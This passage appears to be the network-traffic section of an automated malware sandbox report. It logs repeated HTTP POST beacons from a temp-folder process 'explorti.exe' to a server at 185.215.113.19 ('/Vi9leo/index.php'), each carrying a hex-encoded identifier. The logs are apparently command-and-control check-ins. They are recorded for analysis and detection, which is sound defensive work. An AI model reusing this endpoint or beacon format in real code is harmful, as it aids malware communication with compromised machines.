Jul 26, 2024 13:54:11.169646978 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 13:54:11.170458078 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:54:11.418838024 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.8	49753	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:54:11.532507896 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:54:12.324076891 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 13:54:12.325308084 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:54:12.870152950 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.8	49754	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:54:12.987839937 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:54:13.787285089 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 13:54:13.790110111 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:54:14.044244051 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.8	49755	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:54:14.161899090 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:54:15.305368900 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 13:54:15.306446075 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:54:15.314347029 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 13:54:15.557749987 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.8	49756	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:54:15.673676968 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:54:16.451297998 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 13:54:16.452115059 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:54:16.702826977 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.8	49757	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:54:16.816147089 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:54:17.636550903 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.8	49758	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:54:17.645250082 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:54:18.754647970 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Jul 26, 2024 13:54:18.760319948 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.8	49759	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:54:18.878793001 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:54:19.727988958 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.8	49760	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:54:19.737114906 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:54:20.518985033 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.8	49761	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:54:20.628829002 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:54:21.419428110 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.8	49762	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:54:21.430402994 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:54:22.231404066 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.8	49763	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:54:22.373545885 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:54:23.145967007 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.8	49764	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:54:23.155190945 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:54:23.908741951 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.8	49765	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:54:24.019414902 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:54:24.924216032 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 13:54:24.928272009 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:54:25.182898998 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.8	49766	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:54:25.318640947 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:54:26.099127054 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.8	49767	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:54:26.124506950 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:54:26.919295073 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.8	49768	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:54:27.366394043 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:54:28.501530886 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 13:54:28.504856110 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.8	49769	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:54:28.629575968 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
